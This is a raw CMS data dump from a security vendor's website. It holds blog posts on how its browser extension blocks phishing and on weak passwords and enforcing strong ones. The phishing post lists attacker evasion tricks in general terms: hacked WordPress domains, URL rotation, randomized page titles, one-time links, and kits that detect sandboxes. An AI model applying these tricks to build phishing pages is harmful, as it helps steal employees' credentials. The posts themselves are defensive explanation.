to move beyond email to stop modern attacks taking place inside apps, IM platforms, via malvertising, and on social media.","Read the Blog","https://pushsecurity.com/blog/why-its-time-for-phishing-prevention-to-move-beyond-email/",{"sys":48444,"__typename":1724,"title":48445,"caption":48446,"layoutMode":59,"file":48447},{"id":48145},"Consent phishing image 4","Phishing email prompting the user to reset their password",{"url":48448,"width":48449,"height":48450},"https://images.ctfassets.net/y1cdw1ablpvd/7z6EOVPvvj2gxyafDubSEa/fc4ad4cd51af2da38478313fe991f445/Group_524.png",997,544,{"sys":48452,"__typename":1724,"title":48453,"caption":48454,"layoutMode":59,"file":48455},{"id":48165},"Consent phishing image 5","OAuth apps impersonating Adobe and DocuSign",{"url":48456,"width":8970,"height":48457},"https://images.ctfassets.net/y1cdw1ablpvd/maxSjZ6EyNf0ZL9tgcUBU/3d6da51a409fd1273b576ebc9b132703/image2.png",629,{"sys":48459,"__typename":1724,"title":48460,"caption":48461,"layoutMode":59,"file":48462},{"id":40094},"Consent phishing blog image 6","Cloudflare Turnstile is often used to prevent security bots from analysing the attacker's phishing page.",{"url":48463,"width":48464,"height":48465},"https://images.ctfassets.net/y1cdw1ablpvd/DbEYzQt7m3jY56ALCYWEy/59846e7bd4a3ed204722a9d561e97231/image2.png",938,361,{"sys":48467,"__typename":1724,"title":48468,"caption":48469,"layoutMode":59,"file":48470},{"id":48227},"Consent phishing image 8","Summary of the attack path",{"url":48471,"width":8977,"height":48472},"https://images.ctfassets.net/y1cdw1ablpvd/6aWw8YdAR2WFHvFlTeshsQ/76236f4031c3d921cd1cd00887ce0e90/Slide_16_9_-_110.png",649,{"sys":48474,"__typename":1724,"title":48475,"caption":48475,"layoutMode":59,"file":48476},{"id":48286},"Comparing a legitimate page’s DOM structure with an attacker’s cloned page",{"url":48477,"width":48478,"height":48479},"https://images.ctfassets.net/y1cdw1ablpvd/4HmklQ1H0YIMlNdTkZR8B0/e2e727d9d96867b9d46e35bf097f7a0f/6.png",1875,562,{"sys":48481,"__typename":1724,"title":48482,"caption":48483,"layoutMode":59,"file":48484},{"id":48324},"How Push stops phishing attacks","Push detects and intercepts phishing attackers in the browser when the victim tries to load the page. ",{"url":48485,"width":48486,"height":48487},"https://images.ctfassets.net/y1cdw1ablpvd/2CPV9LSQGHdFgmTxyF1c6s/c1ddb7eb7352ad7a161e447a8fa400e6/image1.png",1535,764,{"sys":48489,"__typename":1724,"title":48490,"caption":48491,"layoutMode":59,"file":48492},{"id":48330},"Phishing toolkit detection","Accessing pages running malicious phishing toolkits is automatically blocked. ",{"url":48493,"width":48494,"height":48495},"https://images.ctfassets.net/y1cdw1ablpvd/3ylgW0MDCCesBjQsoqjD4P/a8bc4df9a430aca6c725f913d2bc6444/image11.png",1440,767,{"sys":48497,"__typename":1740,"content":48498,"name":48517,"title":59},{"id":48336},{"json":48499},{"nodeType":856,"data":48500,"content":48501},{},[48502,48509],{"nodeType":860,"data":48503,"content":48504},{},[48505],{"nodeType":864,"value":48506,"marks":48507,"data":48508},"By fingerprinting the password for your most important accounts used to log into IdPs like Microsoft, Google, Okta, etc. Push can prevent users from entering this password into any other page. So for example, if the user attempts to enter their real Microsoft password onto a phishing page, Push detects and intercepts it, blocking the phishing attempt. ",[],{},{"nodeType":860,"data":48510,"content":48511},{},[48512],{"nodeType":864,"value":48513,"marks":48514,"data":48516},"You can’t phish a victim if they can’t enter their credentials into your phishing site!",[48515],{"type":899},{},"Consent phishing blog insight box 1",{"sys":48519,"__typename":1724,"title":48520,"caption":48521,"layoutMode":59,"file":48522},{"id":48360},"Consent phishing blog image 7","Using Push to analyze and manage OAuth integrations detected in your environment. ",{"url":48523,"width":1736,"height":48524},"https://images.ctfassets.net/y1cdw1ablpvd/37VWcMZobEQXskI8lbfadH/8d771afb2d57258f16c542517b910d72/image10.png",1111,{"items":48526},[],{},"Analyzing two different forms of consent phishing","2025-03-31T00:00:00.000Z",{"items":48531},[48532,48862,49872],{"__typename":2059,"sys":48533,"content":48535,"title":48848,"synopsis":48849,"hashTags":59,"publishedDate":48850,"slug":48851,"tagsCollection":48852,"authorsCollection":48858},{"id":48534},"4bYO5rVy9n2OO3vtMVQeda",{"json":48536},{"data":48537,"content":48538,"nodeType":856},{},[48539,48546,48564,48580,48587,48594,48597,48604,48611,48664,48671,48677,48680,48687,48694,48701,48708,48715,48732,48738,48745,48752,48768,48774,48781,48788,48795,48802,48809,48812,48818,48836,48842],{"data":48540,"content":48541,"nodeType":1009},{},[48542],{"data":48543,"marks":48544,"value":48545,"nodeType":864},{},[],"All phishing eventually leads to the browser",{"data":48547,"content":48548,"nodeType":860},{},[48549,48553,48561],{"data":48550,"marks":48551,"value":48552,"nodeType":864},{},[],"The best attack detection methods are those that focus on ",{"data":48554,"content":48555,"nodeType":883},{"uri":7425},[48556],{"data":48557,"marks":48558,"value":48560,"nodeType":864},{},[48559],{"type":1455},"detecting indicators that are difficult for attackers to change or obfuscate",{"data":48562,"marks":48563,"value":10094,"nodeType":864},{},[],{"data":48565,"content":48566,"nodeType":860},{},[48567,48571,48576],{"data":48568,"marks":48569,"value":48570,"nodeType":864},{},[],"For a credential phishing attack to succeed, the victim ",{"data":48572,"marks":48573,"value":48575,"nodeType":864},{},[48574],{"type":1455},"has",{"data":48577,"marks":48578,"value":48579,"nodeType":864},{},[]," to enter their password into a webpage. There’s no two-ways about it, attackers cannot change this. ",{"data":48581,"content":48582,"nodeType":860},{},[48583],{"data":48584,"marks":48585,"value":48586,"nodeType":864},{},[],"So it stands to reason that, if you can detect this user behavior, and block them from entering their password, then you can stop phishing. ",{"data":48588,"content":48589,"nodeType":860},{},[48590],{"data":48591,"marks":48592,"value":48593,"nodeType":864},{},[],"This is exactly what Push does.",{"data":48595,"content":48596,"nodeType":1005},{},[],{"data":48598,"content":48599,"nodeType":1312},{},[48600],{"data":48601,"marks":48602,"value":48603,"nodeType":864},{},[],"Most anti-phishing tools are easily bypassed",{"data":48605,"content":48606,"nodeType":860},{},[48607],{"data":48608,"marks":48609,"value":48610,"nodeType":864},{},[],"Other anti-phishing tools rely on detecting elements of the attack that attackers can change and hide, such as domains or the webpage contents. Attackers use tricks to evade these detection, like:",{"data":48612,"content":48613,"nodeType":941},{},[48614,48624,48634,48644,48654],{"data":48615,"content":48616,"nodeType":945},{},[48617],{"data":48618,"content":48619,"nodeType":860},{},[48620],{"data":48621,"marks":48622,"value":48623,"nodeType":864},{},[],"Using Cloudflare Workers to block automatic analysis of their phishing site",{"data":48625,"content":48626,"nodeType":945},{},[48627],{"data":48628,"content":48629,"nodeType":860},{},[48630],{"data":48631,"marks":48632,"value":48633,"nodeType":864},{},[],"Hacking a Wordpress blog to get a reputable domain that passes domain checks ",{"data":48635,"content":48636,"nodeType":945},{},[48637],{"data":48638,"content":48639,"nodeType":860},{},[48640],{"data":48641,"marks":48642,"value":48643,"nodeType":864},{},[],"Using redirects and rotating the URLs delivered to the victim to bypass link analysis",{"data":48645,"content":48646,"nodeType":945},{},[48647],{"data":48648,"content":48649,"nodeType":860},{},[48650],{"data":48651,"marks":48652,"value":48653,"nodeType":864},{},[],"Randomizing the HTML title for the web page to bypass blocklists ",{"data":48655,"content":48656,"nodeType":945},{},[48657],{"data":48658,"content":48659,"nodeType":860},{},[48660],{"data":48661,"marks":48662,"value":48663,"nodeType":864},{},[],"One-time phishing links that only work the first time they are clicked",{"data":48665,"content":48666,"nodeType":860},{},[48667],{"data":48668,"marks":48669,"value":48670,"nodeType":864},{},[],"Push is putting an end to this game of cat and mouse, by keeping it really simple; you can’t phish someone who can’t put their password into a phishing page. ",{"data":48672,"content":48676,"nodeType":996},{"target":48673},{"sys":48674},{"id":48675,"type":1001,"linkType":1002},"6AwOZSpqaChmeksnj4SyWE",[],{"data":48678,"content":48679,"nodeType":1005},{},[],{"data":48681,"content":48682,"nodeType":1312},{},[48683],{"data":48684,"marks":48685,"value":48686,"nodeType":864},{},[],"Domain-binding passwords",{"data":48688,"content":48689,"nodeType":860},{},[48690],{"data":48691,"marks":48692,"value":48693,"nodeType":864},{},[],"If you’re familiar with how passkeys are domain-bound, then think of what Push does as domain-binding passwords. We pin the password to its legitimate domain(s) and then don’t allow it to be entered into any webpage on any other domain. ",{"data":48695,"content":48696,"nodeType":860},{},[48697],{"data":48698,"marks":48699,"value":48700,"nodeType":864},{},[],"But just because you’ve stopped your users from being phished doesn’t mean you don’t want to know when attackers are attempting to phish your users and how. ",{"data":48702,"content":48703,"nodeType":860},{},[48704],{"data":48705,"marks":48706,"value":48707,"nodeType":864},{},[],"Push still inspects webpages to see if attackers are rendering cloned app login pages in the browser or if known AitM and BitM toolkits are being used. This way you don’t lose visibility of the unsuccessful attacks that are targeting your users. Think of it as a handy second and third layer of defense.",{"data":48709,"content":48710,"nodeType":860},{},[48711],{"data":48712,"marks":48713,"value":48714,"nodeType":864},{},[],"Lets run through a quick before and after example:",{"data":48716,"content":48717,"nodeType":1312},{},[48718,48722,48728],{"data":48719,"marks":48720,"value":48721,"nodeType":864},{},[],"Scenario 1: An attacker attempts to phish an employee that ",{"data":48723,"marks":48724,"value":48727,"nodeType":864},{},[48725,48726],{"type":1455},{"type":899},"doesn’t",{"data":48729,"marks":48730,"value":48731,"nodeType":864},{},[]," have Push deployed to their browser.",{"data":48733,"content":48737,"nodeType":996},{"target":48734},{"sys":48735},{"id":48736,"type":1001,"linkType":1002},"2CbGMUSJsP1mNeHkmpLl6N",[],{"data":48739,"content":48740,"nodeType":860},{},[48741],{"data":48742,"marks":48743,"value":48744,"nodeType":864},{},[],"Here, an attacker hacks a Wordpress blog to get a reputable domain and then runs a phishing toolkit on the webpage. They email one of your employees a link to it. Your SWG / email scanning solution inspects it in a sandbox but the phish kit detects this and redirects to a benign site so that it passes the inspection. ",{"data":48746,"content":48747,"nodeType":860},{},[48748],{"data":48749,"marks":48750,"value":48751,"nodeType":864},{},[],"Your user gets the email with the link and is now free to interact with the phishing page. They enter their credentials plus MFA code into the page and voila! The attacker steals them and is able to compromise the user’s account.  ",{"data":48753,"content":48754,"nodeType":1312},{},[48755,48759,48764],{"data":48756,"marks":48757,"value":48758,"nodeType":864},{},[],"Scenario 2: An attacker attempts to phish an employee that ",{"data":48760,"marks":48761,"value":3053,"nodeType":864},{},[48762,48763],{"type":1455},{"type":899},{"data":48765,"marks":48766,"value":48767,"nodeType":864},{},[]," have Push deployed to their browser. ",{"data":48769,"content":48773,"nodeType":996},{"target":48770},{"sys":48771},{"id":48772,"type":1001,"linkType":1002},"77smnID1woCfFJrJPyTvKY",[],{"data":48775,"content":48776,"nodeType":860},{},[48777],{"data":48778,"marks":48779,"value":48780,"nodeType":864},{},[],"This time, the attacker uses the same phishing toolkit and domain from the first example. But in reality, they don’t have to send it to your employee using email, instead, they could use LinkedIn messenger, Slack, Teams, or any application that allows employees to communicate with each other. ",{"data":48782,"content":48783,"nodeType":860},{},[48784],{"data":48785,"marks":48786,"value":48787,"nodeType":864},{},[],"Like before, the user receives the link, opens it and starts to enter their credentials into the webpage. This time though, the Push browser extension inspects the webpage running in the user's browser. Push observes that the webpage is a login page and the user is entering their password into the page.",{"data":48789,"content":48790,"nodeType":860},{},[48791],{"data":48792,"marks":48793,"value":48794,"nodeType":864},{},[],"The first detection Push makes is checking that the password the user is entering matches the domain that password is pinned to. Since it doesn't match, based on this detection alone the user is automatically redirected to a blocking page. An important point to make here is that the password never leaves the user’s browser and the check is made using a shortened salted hash of the password.   ",{"data":48796,"content":48797,"nodeType":860},{},[48798],{"data":48799,"marks":48800,"value":48801,"nodeType":864},{},[],"The second detection Push makes is that the rendered web app is using a cloned app login page. The third detection is that a phishing toolkit is running in the web app code. ",{"data":48803,"content":48804,"nodeType":860},{},[48805],{"data":48806,"marks":48807,"value":48808,"nodeType":864},{},[],"In this particular scenario these second and third detections serve as useful context for understanding the nature of the phishing attack. But both will still redirect to a blocking page if they are triggered in isolation of the other phishing detections. ",{"data":48810,"content":48811,"nodeType":1005},{},[],{"data":48813,"content":48814,"nodeType":1009},{},[48815],{"data":48816,"marks":48817,"value":40331,"nodeType":864},{},[],{"data":48819,"content":48820,"nodeType":860},{},[48821,48825,48832],{"data":48822,"marks":48823,"value":48824,"nodeType":864},{},[],"We also detect other identity-related attack techniques used to compromise user accounts. That includes credential stuffing, password spraying and session hijacking using stolen session tokens. If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",{"data":48826,"content":48827,"nodeType":883},{"uri":5642},[48828],{"data":48829,"marks":48830,"value":40352,"nodeType":864},{},[48831],{"type":1455},{"data":48833,"marks":48834,"value":48835,"nodeType":864},{},[],".  ",{"data":48837,"content":48841,"nodeType":996},{"target":48838},{"sys":48839},{"id":48840,"type":1001,"linkType":1002},"2JSmYDaiAciOx7Z1MRuJlA",[],{"data":48843,"content":48844,"nodeType":860},{},[48845],{"data":48846,"marks":48847,"value":21,"nodeType":864},{},[],"Detecting and blocking phishing attacks in the browser","How Push detects and blocks phishing attempts in the browser – explained in less than two minutes. ","2024-10-23T00:00:00.000Z","detecting-and-blocking-phishing-attacks-in-the-browser",{"items":48853},[48854,48856],{"sys":48855,"name":6593},{"id":6592},{"sys":48857,"name":342},{"id":6596},{"items":48859},[48860],{"fullName":4878,"firstName":4879,"jobTitle":851,"profilePicture":48861},{"url":4881},{"__typename":2059,"sys":48863,"content":48865,"title":49858,"synopsis":49859,"hashTags":59,"publishedDate":49860,"slug":49861,"tagsCollection":49862,"authorsCollection":49868},{"id":48864},"5aB5x5VXrMv7PDmH0iiK0c",{"json":48866},{"data":48867,"content":48868,"nodeType":856},{},[48869,48888,48895,48902,48909,48916,48922,48929,48945,48948,48955,48962,48969,48976,48986,48993,49000,49007,49015,49022,49094,49106,49113,49121,49128,49186,49198,49205,49211,49219,49226,49259,49282,49289,49299,49302,49309,49328,49335,49368,49375,49382,49389,49395,49398,49405,49412,49420,49427,49434,49450,49456,49464,49471,49477,49485,49505,49512,49545,49566,49572,49592,49612,49620,49627,49634,49640,49660,49663,49671,49686,49693,49700,49750,49756,49763,49770,49813,49816,49824,49831,49834,49841],{"data":48870,"content":48871,"nodeType":860},{},[48872,48876,48885],{"data":48873,"marks":48874,"value":48875,"nodeType":864},{},[],"It wasn’t supposed to be like this. Passwords were supposed to be dead (just ask ",{"data":48877,"content":48879,"nodeType":883},{"uri":48878},"https://www.cnet.com/news/privacy/gates-predicts-death-of-the-password/",[48880],{"data":48881,"marks":48882,"value":48884,"nodeType":864},{},[48883],{"type":1455},"Bill Gates",{"data":48886,"marks":48887,"value":32836,"nodeType":864},{},[],{"data":48889,"content":48890,"nodeType":860},{},[48891],{"data":48892,"marks":48893,"value":48894,"nodeType":864},{},[],"Instead, hardworking security pros are left to sit around in community center basements drinking mediocre coffee and commiserating.",{"data":48896,"content":48897,"nodeType":860},{},[48898],{"data":48899,"marks":48900,"value":48901,"nodeType":864},{},[],"“I admit it. My users still use passwords.”",{"data":48903,"content":48904,"nodeType":860},{},[48905],{"data":48906,"marks":48907,"value":48908,"nodeType":864},{},[],"“Yeah, mine too. I’ve been telling people we’re rolling out passkeys for three years now. I’m not sure how much longer I can keep this up …”",{"data":48910,"content":48911,"nodeType":860},{},[48912],{"data":48913,"marks":48914,"value":48915,"nodeType":864},{},[],"Somber nodding all around. Hugs. A few chocolate-chip cookies on paper napkins.",{"data":48917,"content":48921,"nodeType":996},{"target":48918},{"sys":48919},{"id":48920,"type":1001,"linkType":1002},"4Wt29DxSSczFt5THWkuIiS",[],{"data":48923,"content":48924,"nodeType":860},{},[48925],{"data":48926,"marks":48927,"value":48928,"nodeType":864},{},[],"This is a no-judgment zone here at Push Security. So let’s take a look at why we’re still stuck with passwords, how attackers are increasingly exploiting weak credentials to infiltrate organizations, and how Push can help you get visibility and control of all your workforce identities.",{"data":48930,"content":48931,"nodeType":860},{},[48932,48936,48941],{"data":48933,"marks":48934,"value":48935,"nodeType":864},{},[],"We’ll also cover how you can use Push’s latest feature, ",{"data":48937,"marks":48938,"value":48940,"nodeType":864},{},[48939],{"type":899},"Strong password enforcement",{"data":48942,"marks":48943,"value":48944,"nodeType":864},{},[],", to require that employees use strong, unique passwords. Push automatically detects when employees have weak, reused, or stolen passwords and then guides them to update their password using in-browser messaging — even on apps that don’t natively support administrative control of password posture.",{"data":48946,"content":48947,"nodeType":1005},{},[],{"data":48949,"content":48950,"nodeType":1009},{},[48951],{"data":48952,"marks":48953,"value":48954,"nodeType":864},{},[],"3 reasons why we’re still stuck with passwords",{"data":48956,"content":48957,"nodeType":860},{},[48958],{"data":48959,"marks":48960,"value":48961,"nodeType":864},{},[],"At the risk of preaching to the choir, let’s review why we’re still stuck with passwords. ",{"data":48963,"content":48964,"nodeType":860},{},[48965],{"data":48966,"marks":48967,"value":48968,"nodeType":864},{},[],"It’s worth stating the Push perspective up front: We’re not here to push the narrative that you must completely get rid of passwords. To begin with, it’s not easy to get rid of them. Like the imaginary scene from the passwordless support group, we’ve lived the reality of this.",{"data":48970,"content":48971,"nodeType":860},{},[48972],{"data":48973,"marks":48974,"value":48975,"nodeType":864},{},[],"What we observe across our install base for the Push browser agent reinforces this reality. For the last 1 million or so logins that Push recorded, more than a quarter (26%) were password logins.",{"data":48977,"content":48978,"nodeType":1116},{},[48979],{"data":48980,"content":48981,"nodeType":860},{},[48982],{"data":48983,"marks":48984,"value":48985,"nodeType":864},{},[],"For the last 1M+ logins that the Push browser agent observed, more than a quarter were password logins.",{"data":48987,"content":48988,"nodeType":860},{},[48989],{"data":48990,"marks":48991,"value":48992,"nodeType":864},{},[],"Of those password logins, 18% had a security issue with the password — reused, easily guessable, already leaked in a public breach list, or actively for sale in criminal forums.",{"data":48994,"content":48995,"nodeType":860},{},[48996],{"data":48997,"marks":48998,"value":48999,"nodeType":864},{},[],"Yet when strong, unique passwords are used in conjunction with MFA, they can provide a powerful line of defense. Indeed, in cases where onboarding an app to SSO isn’t possible (for reasons we’ll cover below), a strong, unique password plus MFA is the most pragmatic solution you can achieve.",{"data":49001,"content":49002,"nodeType":860},{},[49003],{"data":49004,"marks":49005,"value":49006,"nodeType":864},{},[],"Here’s why bad passwords persist, and why it matters.",{"data":49008,"content":49009,"nodeType":1312},{},[49010],{"data":49011,"marks":49012,"value":49014,"nodeType":864},{},[49013],{"type":899},"Systemic reasons",{"data":49016,"content":49017,"nodeType":860},{},[49018],{"data":49019,"marks":49020,"value":49021,"nodeType":864},{},[],"If we zoom out, there are several systemic reasons that contribute to the persistence of password security issues:",{"data":49023,"content":49024,"nodeType":941},{},[49025,49053,49079],{"data":49026,"content":49027,"nodeType":945},{},[49028],{"data":49029,"content":49030,"nodeType":860},{},[49031,49036,49040,49049],{"data":49032,"marks":49033,"value":49035,"nodeType":864},{},[49034],{"type":899},"Self-adoption of work apps",{"data":49037,"marks":49038,"value":49039,"nodeType":864},{},[]," makes it extremely difficult to know all the workforce identities that exist across your environment, let alone whether they’re using a secure authentication method, or the strength or uniqueness of their password. Push’s ",{"data":49041,"content":49043,"nodeType":883},{"uri":49042},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/",[49044],{"data":49045,"marks":49046,"value":49048,"nodeType":864},{},[49047],{"type":1455},"own research",{"data":49050,"marks":49051,"value":49052,"nodeType":864},{},[]," shows that for an average organization, each employee has 15 identities.",{"data":49054,"content":49055,"nodeType":945},{},[49056],{"data":49057,"content":49058,"nodeType":860},{},[49059,49064,49068,49075],{"data":49060,"marks":49061,"value":49063,"nodeType":864},{},[49062],{"type":899},"Apps optimize signups for low friction, not security.",{"data":49065,"marks":49066,"value":49067,"nodeType":864},{},[]," That often results in multiple authentication methods tied to any given account because local password accounts can still persist even after SSO onboarding — a phenomenon that we call ",{"data":49069,"content":49070,"nodeType":883},{"uri":19131},[49071],{"data":49072,"marks":49073,"value":19137,"nodeType":864},{},[49074],{"type":1455},{"data":49076,"marks":49077,"value":49078,"nodeType":864},{},[]," because they provide attackers with a way around a company’s enterprise SSO solution. These local accounts represent a significant risk, and most are invisible. Which brings us to …",{"data":49080,"content":49081,"nodeType":945},{},[49082],{"data":49083,"content":49084,"nodeType":860},{},[49085,49090],{"data":49086,"marks":49087,"value":49089,"nodeType":864},{},[49088],{"type":899},"Many apps provide very little information to admins about the posture of accounts",{"data":49091,"marks":49092,"value":49093,"nodeType":864},{},[]," on that service, and even fewer offer management options to address security issues on those accounts. Some services provide no information at all about which accounts can even access a given tenant.",{"data":49095,"content":49096,"nodeType":860},{},[49097,49102],{"data":49098,"marks":49099,"value":49101,"nodeType":864},{},[49100],{"type":899},"The impact: ",{"data":49103,"marks":49104,"value":49105,"nodeType":864},{},[],"These systemic factors contribute to what we see many organizations grappling with: Known visibility gaps in their workforce identities, which are scattered across many more third-party apps than they imagine, and unknown account security risks for both managed and unmanaged apps.",{"data":49107,"content":49108,"nodeType":860},{},[49109],{"data":49110,"marks":49111,"value":49112,"nodeType":864},{},[],"These gaps open up a large attack surface for organizations. The 2024 Verizon DBIR found that 79% of web application compromises were the result of breached creds, and researchers at IBM reported last year that they observed a 71% year-over-year increase in cyberattacks using stolen or compromised credentials.",{"data":49114,"content":49115,"nodeType":1312},{},[49116],{"data":49117,"marks":49118,"value":49120,"nodeType":864},{},[49119],{"type":899},"Technical reasons",{"data":49122,"content":49123,"nodeType":860},{},[49124],{"data":49125,"marks":49126,"value":49127,"nodeType":864},{},[],"There are also several technical reasons why bad passwords persist:",{"data":49129,"content":49130,"nodeType":941},{},[49131,49158],{"data":49132,"content":49133,"nodeType":945},{},[49134],{"data":49135,"content":49136,"nodeType":860},{},[49137,49140,49150,49154],{"data":49138,"marks":49139,"value":21,"nodeType":864},{},[],{"data":49141,"content":49143,"nodeType":883},{"uri":49142},"https://www.ncsc.gov.uk/blog-post/passkeys-not-perfect-getting-better",[49144],{"data":49145,"marks":49146,"value":49149,"nodeType":864},{},[49147,49148],{"type":1455},{"type":899},"Going passwordless is hard",{"data":49151,"marks":49152,"value":1171,"nodeType":864},{},[49153],{"type":899},{"data":49155,"marks":49156,"value":49157,"nodeType":864},{},[],"because it requires a large investment of time, money, and training for end-users. In environments with a mix of older and newer infrastructure, it can be challenging to get complete coverage, and employees may struggle with the transition to device-based authentication (especially when they lose their device and aren’t familiar with how to regain account access).",{"data":49159,"content":49160,"nodeType":945},{},[49161],{"data":49162,"content":49163,"nodeType":860},{},[49164,49169,49173,49182],{"data":49165,"marks":49166,"value":49168,"nodeType":864},{},[49167],{"type":899},"Many apps do not even provide a SAML option",{"data":49170,"marks":49171,"value":49172,"nodeType":864},{},[],", making it difficult to onboard every business app to SSO even once you know about them all. Last we checked, only about 30% of commonly used work apps supported SAML. Even when apps do provide the option, many charge the infamous “",{"data":49174,"content":49176,"nodeType":883},{"uri":49175},"https://sso.tax/",[49177],{"data":49178,"marks":49179,"value":49181,"nodeType":864},{},[49180],{"type":1455},"SSO tax",{"data":49183,"marks":49184,"value":49185,"nodeType":864},{},[],",” putting the feature behind enterprise plans.",{"data":49187,"content":49188,"nodeType":860},{},[49189,49194],{"data":49190,"marks":49191,"value":49193,"nodeType":864},{},[49192],{"type":899},"The impact:",{"data":49195,"marks":49196,"value":49197,"nodeType":864},{},[]," What ends up happening in many organizations is a patchwork of login methods, including passwords, passkeys, OIDC, and SAML. Looking at data from Push’s install base, we see on average around 15,000 accounts per 1,000 users, with 5,900+ outside of SSO — about 40%. ",{"data":49199,"content":49200,"nodeType":860},{},[49201],{"data":49202,"marks":49203,"value":49204,"nodeType":864},{},[],"That means more — not less — for a security and IT team to manage, often without the visibility or control they need to do so effectively.",{"data":49206,"content":49210,"nodeType":996},{"target":49207},{"sys":49208},{"id":49209,"type":1001,"linkType":1002},"2QnWVpPYRyJQaQ5TuKSSLp",[],{"data":49212,"content":49213,"nodeType":1312},{},[49214],{"data":49215,"marks":49216,"value":49218,"nodeType":864},{},[49217],{"type":899},"Human reasons",{"data":49220,"content":49221,"nodeType":860},{},[49222],{"data":49223,"marks":49224,"value":49225,"nodeType":864},{},[],"Finally, there are a lot of human reasons why poor passwords persist, all of them familiar and intractable:",{"data":49227,"content":49228,"nodeType":941},{},[49229,49244],{"data":49230,"content":49231,"nodeType":945},{},[49232],{"data":49233,"content":49234,"nodeType":860},{},[49235,49240],{"data":49236,"marks":49237,"value":49239,"nodeType":864},{},[49238],{"type":899},"Password change fatigue",{"data":49241,"marks":49242,"value":49243,"nodeType":864},{},[],", resulting in weak and reused passwords — often driven by incomplete adoption of enterprise password managers or outdated password security policies that require users to rotate passwords frequently. ",{"data":49245,"content":49246,"nodeType":945},{},[49247],{"data":49248,"content":49249,"nodeType":860},{},[49250,49255],{"data":49251,"marks":49252,"value":49254,"nodeType":864},{},[49253],{"type":899},"Shortcuts that busy humans take",{"data":49256,"marks":49257,"value":49258,"nodeType":864},{},[]," to get work done on a daily basis, including reusing passwords across personal and corporate accounts, storing passwords insecurely, and using easier-to-remember passwords over secure, complex ones.  ",{"data":49260,"content":49261,"nodeType":860},{},[49262,49266,49270,49278],{"data":49263,"marks":49264,"value":49193,"nodeType":864},{},[49265],{"type":899},{"data":49267,"marks":49268,"value":49269,"nodeType":864},{},[]," When there’s a large, complex, and largely invisible attack surface made up of these online corporate identities, adversaries profit. Just look at any of the ",{"data":49271,"content":49272,"nodeType":883},{"uri":45063},[49273],{"data":49274,"marks":49275,"value":49277,"nodeType":864},{},[49276],{"type":1455},"major identity attacks",{"data":49279,"marks":49280,"value":49281,"nodeType":864},{},[]," of the past year, some of which used password-spraying and credential-stuffing techniques to compromise accounts and pivot to high-value systems and data.",{"data":49283,"content":49284,"nodeType":860},{},[49285],{"data":49286,"marks":49287,"value":49288,"nodeType":864},{},[],"Password reuse also extends the blast radius for any account takeover incident when MFA is missing — a gap that occurs more often than you may think. Typically, 37% of logins observed by Push upon initial deployment into a new customer environment do not use any form of MFA.",{"data":49290,"content":49291,"nodeType":1116},{},[49292],{"data":49293,"content":49294,"nodeType":860},{},[49295],{"data":49296,"marks":49297,"value":49298,"nodeType":864},{},[],"2 in 5 logins observed by Push upon initial deployment into a new customer environment do not use any form of MFA.",{"data":49300,"content":49301,"nodeType":1005},{},[],{"data":49303,"content":49304,"nodeType":1009},{},[49305],{"data":49306,"marks":49307,"value":49308,"nodeType":864},{},[],"Why identity posture matters more in a SaaS-first world",{"data":49310,"content":49311,"nodeType":860},{},[49312,49316,49324],{"data":49313,"marks":49314,"value":49315,"nodeType":864},{},[],"When most work now happens via the browser on web-based applications, the stakes are even higher for preventing account takeover. That’s because the way that attacks occur in a SaaS environment is ",{"data":49317,"content":49318,"nodeType":883},{"uri":45206},[49319],{"data":49320,"marks":49321,"value":49323,"nodeType":864},{},[49322],{"type":1455},"very different",{"data":49325,"marks":49326,"value":49327,"nodeType":864},{},[]," from traditional network attacks, and there are few effective ways to detect and respond post-account compromise.",{"data":49329,"content":49330,"nodeType":860},{},[49331],{"data":49332,"marks":49333,"value":49334,"nodeType":864},{},[],"The average SaaS attack path looks like this:",{"data":49336,"content":49337,"nodeType":941},{},[49338,49348,49358],{"data":49339,"content":49340,"nodeType":945},{},[49341],{"data":49342,"content":49343,"nodeType":860},{},[49344],{"data":49345,"marks":49346,"value":49347,"nodeType":864},{},[],"Attackers gain control of legitimate employee accounts using stolen credentials or via password-spraying or credential-stuffing techniques.",{"data":49349,"content":49350,"nodeType":945},{},[49351],{"data":49352,"content":49353,"nodeType":860},{},[49354],{"data":49355,"marks":49356,"value":49357,"nodeType":864},{},[],"Attackers exfiltrate data.",{"data":49359,"content":49360,"nodeType":945},{},[49361],{"data":49362,"content":49363,"nodeType":860},{},[49364],{"data":49365,"marks":49366,"value":49367,"nodeType":864},{},[],"The end.",{"data":49369,"content":49370,"nodeType":860},{},[49371],{"data":49372,"marks":49373,"value":49374,"nodeType":864},{},[],"Compare that to traditional network or enterprise cloud attacks, which usually involve more complex lateral movement, privilege escalation, and defense evasion.",{"data":49376,"content":49377,"nodeType":860},{},[49378],{"data":49379,"marks":49380,"value":49381,"nodeType":864},{},[],"With limited log data and few response capabilities provided by most SaaS apps, security teams also have few good options to stop the damage of an account takeover once one has occurred. ",{"data":49383,"content":49384,"nodeType":860},{},[49385],{"data":49386,"marks":49387,"value":49388,"nodeType":864},{},[],"That’s why at Push, we advocate for “shifting left,” and preventing account takeover before it happens.",{"data":49390,"content":49394,"nodeType":996},{"target":49391},{"sys":49392},{"id":49393,"type":1001,"linkType":1002},"6wIzMu3jBhaas9jtpV48bz",[],{"data":49396,"content":49397,"nodeType":1005},{},[],{"data":49399,"content":49400,"nodeType":1009},{},[49401],{"data":49402,"marks":49403,"value":49404,"nodeType":864},{},[],"How Push helps you ensure strong passwords",{"data":49406,"content":49407,"nodeType":860},{},[49408],{"data":49409,"marks":49410,"value":49411,"nodeType":864},{},[],"There are four capabilities that security teams need in order to regain control over password security issues across their corporate accounts. Here’s how Push accomplishes each one.",{"data":49413,"content":49414,"nodeType":1312},{},[49415],{"data":49416,"marks":49417,"value":49419,"nodeType":864},{},[49418],{"type":899},"1. A reliable inventory of all the apps that employees are using, including work apps and internal apps.",{"data":49421,"content":49422,"nodeType":860},{},[49423],{"data":49424,"marks":49425,"value":49426,"nodeType":864},{},[],"Push achieves this by deploying a browser agent to employee browsers that can directly observe their login activity, which feeds the data back into an admin console (or your SIEM/SOAR or other third-party system). You can enforce the installation of the agent using any MDM solution, on all major browsers.",{"data":49428,"content":49429,"nodeType":860},{},[49430],{"data":49431,"marks":49432,"value":49433,"nodeType":864},{},[],"Once the agent is activated, it begins immediately capturing employee logins and produces a real-time inventory of all your work and internal apps. Because Push observes the login directly in the browser, it can identify all the apps and accounts being used by your employees — both managed and unmanaged (shadow 